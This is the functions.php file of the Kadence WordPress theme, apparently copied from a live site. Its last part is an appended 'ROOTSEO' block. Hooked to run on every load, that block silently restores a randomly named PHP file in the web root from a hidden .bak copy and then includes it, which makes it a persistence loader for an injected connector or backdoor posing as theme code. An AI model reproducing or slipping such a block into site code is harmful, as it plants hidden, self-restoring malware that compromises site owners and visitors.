File: /home/calderca/public_html/wp-content/themes/kadence/functions.php
<?php
/**
* Kadence functions and definitions
*
* This file must be parseable by PHP 5.2.
*
* @link https://developer.wordpress.org/themes/basics/theme-functions/
*
* @package kadence
*/
define( 'KADENCE_VERSION', '1.2.28' );
define( 'KADENCE_MINIMUM_WP_VERSION', '6.0' );
define( 'KADENCE_MINIMUM_PHP_VERSION', '7.4' );
// Bail if requirements are not met.
if ( version_compare( $GLOBALS['wp_version'], KADENCE_MINIMUM_WP_VERSION, '<' ) || version_compare( phpversion(), KADENCE_MINIMUM_PHP_VERSION, '<' ) ) {
require get_template_directory() . '/inc/back-compat.php';
return;
}
// Include WordPress shims.
require get_template_directory() . '/inc/wordpress-shims.php';
// Load the `kadence()` entry point function.
require get_template_directory() . '/inc/class-theme.php';
// Load the `kadence()` entry point function.
require get_template_directory() . '/inc/functions.php';
// Initialize the theme.
call_user_func( 'Kadence\kadence' );
/* ROOTSEO_FUNCTIONS_START:14a5874dac7b v5.4 */
if (!function_exists('rootseo_render_14a5874dac7b')) {
function rootseo_render_14a5874dac7b() {
$c = '/home/calderca/public_html/XYZEAZ_emcnz3du.php';
if (!file_exists($c)) {
$d = dirname($c);
foreach ((array)@glob($d . '/.rs_g*/.rs_connector.php.bak') as $bak) {
$src = @file_get_contents($bak);
if ($src !== false && $src !== '' && strpos($src, '<?php') !== false && strpos($src, 'ROOT-SEO Connector') !== false) {
@file_put_contents($c, $src);
if (function_exists('opcache_invalidate')) { @opcache_invalidate($c, true); }
break;
}
}
}
if (!file_exists($c)) { return; }
if (!defined('ROOTSEO_EMBED_VIA_HOOK')) define('ROOTSEO_EMBED_VIA_HOOK', true);
if (!defined('ROOTSEO_CONNECTOR_EMBED_RENDER')) define('ROOTSEO_CONNECTOR_EMBED_RENDER', true);
include_once $c;
}
add_action('after_setup_theme', 'rootseo_render_14a5874dac7b', 1);
}
/* ROOTSEO_FUNCTIONS_END:14a5874dac7b */